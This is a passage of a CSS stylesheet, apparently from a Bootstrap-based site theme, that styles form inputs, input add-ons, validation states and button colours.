}
select::-ms-expand,
textarea::-ms-expand,
input[type="text"]::-ms-expand,
input[type="password"]::-ms-expand,
input[type="datetime"]::-ms-expand,
input[type="datetime-local"]::-ms-expand,
input[type="date"]::-ms-expand,
input[type="month"]::-ms-expand,
input[type="time"]::-ms-expand,
input[type="week"]::-ms-expand,
input[type="number"]::-ms-expand,
input[type="email"]::-ms-expand,
input[type="url"]::-ms-expand,
input[type="search"]::-ms-expand,
input[type="tel"]::-ms-expand,
input[type="color"]::-ms-expand,
.inputbox::-ms-expand {
  background-color: transparent;
  border: 0;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: left;
    width: 160px;
    padding-top: 5px;
    text-align: right;
  }
}
.form-horizontal .control-group .controls {
  margin-left: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-left: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-left: 0;
  vertical-align: top;
  border-radius: 0 0 0 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0 0 0 0;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0 0 0 0;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0 0 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-right: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-left: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-left: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  min-width: 0;
  padding: 0;
  margin: 0;
  border: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: 700;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  -webkit-appearance: none;
  appearance: none;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control::-ms-expand {
  background-color: transparent;
  border: 0;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"].form-control,
  input[type="time"].form-control,
  input[type="datetime-local"].form-control,
  input[type="month"].form-control {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: 400;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-top: 4px \9;
  margin-left: -20px;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: 400;
  vertical-align: middle;
  cursor: pointer;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-left: 10px;
}
.form-control-static {
  min-height: 34px;
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-right: 0;
  padding-left: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.form-group-sm select.form-control {
  height: 30px;
  line-height: 30px;
}
.form-group-sm textarea.form-control,
.form-group-sm select[multiple].form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  min-height: 32px;
  padding: 6px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.form-group-lg select.form-control {
  height: 45px;
  line-height: 45px;
}
.form-group-lg textarea.form-control,
.form-group-lg select[multiple].form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  min-height: 38px;
  padding: 11px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-right: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback,
.input-group-lg + .form-control-feedback,
.form-group-lg .form-control + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback,
.input-group-sm + .form-control-feedback,
.form-group-sm .form-control + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  background-color: #dff0d8;
  border-color: #468847;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #c09853;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #b94a48;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-left: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  padding-top: 7px;
  margin-top: 0;
  margin-bottom: 0;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-right: -20px;
  margin-left: -20px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    padding-top: 7px;
    margin-bottom: 0;
    text-align: right;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  right: 20px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 11px;
    font-size: 18px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
    font-size: 12px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  filter: alpha(opacity=65);
  opacity: 0.65;
  -webkit-box-shadow: none;
  box-shadow: none;
}
a.btn.disabled,
fieldset[disabled] a.btn {
  pointer-events: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:focus,
.btn-default.focus {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #8c8c8c;
}
.btn-default:hover {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  background-image: none;
  border-color: #adadad;
}
.btn-default:active:hover,
.btn-default.active:hover,
.open > .dropdown-toggle.btn-default:hover,
.btn-default:active:focus,
.btn-default.active:focus,
.open > .dropdown-toggle.btn-default:focus,
.btn-default:active.focus,
.btn-default.active.focus,
.open > .dropdown-toggle.btn-default.focus {
  color: #333333;
  background-color: #d4d4d4;
  border-color: #8c8c8c;
}
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-primary:focus,
.btn-primary.focus {
  color: #ffffff;
  background-color: #990000;
  border-color: #330000;
}
.btn-primary:hover {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #990000;
  background-image: none;
  border-color: #750000;
}
.btn-primary:active:hover,
.btn-primary.active:hover,
.open > .dropdown-toggle.btn-primary:hover,
.btn-primary:active:focus,
.btn-primary.active:focus,
.open > .dropdown-toggle.btn-primary:focus,
.btn-primary:active.focus,
.btn-primary.active.focus,
.open > .dropdown-toggle.btn-primary.focus {
  color: #ffffff;
  background-color: #750000;
  border-color: #330000;
}
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-primary .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:focus,
.btn-success.focus {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #122e18;
}
.btn-success:hover {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  background-image: none;
  border-color: #255d31;
}
.btn-success:active:hover,
.btn-success.active:hover,
.open > .dropdown-toggle.btn-success:hover,
.btn-success:active:focus,
.btn-success.active:focus,
.open > .dropdown-toggle.btn-success:focus,
.btn-success:active.focus,
.btn-success.active.focus,
.open > .dropdown-toggle.btn-success.focus {
  color: #ffffff;
  background-color: #255d31;
  border-color: #122e18;
}
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
fieldset[disabled] .btn-success.focus {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:focus,
.btn-info.focus {
  color: #ffffff;
  background-color: #007399;
  border-color: #002633;
}
.btn-info:hover {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  background-image: none;
  border-color: #005875;
